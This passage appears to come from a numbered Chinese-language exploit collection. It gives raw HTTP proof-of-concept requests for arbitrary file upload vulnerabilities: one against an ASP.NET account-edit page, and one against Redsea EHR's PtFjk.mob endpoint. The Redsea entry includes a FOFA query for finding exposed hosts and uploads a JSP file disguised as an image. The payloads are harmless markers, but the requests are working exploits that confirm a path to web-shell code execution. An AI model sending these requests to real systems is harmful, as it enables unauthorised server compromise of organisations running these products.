POST /User/AccountEdit.aspx HTTP/1.1
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"


-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"


-----------------------------786435874t38587593865736587346567358735687--

/_data/Uploads/1123.txt

203. 红海云 (Redsea) EHR PtFjk file upload
FOFA:body="RedseaPlatform"
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type:image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--
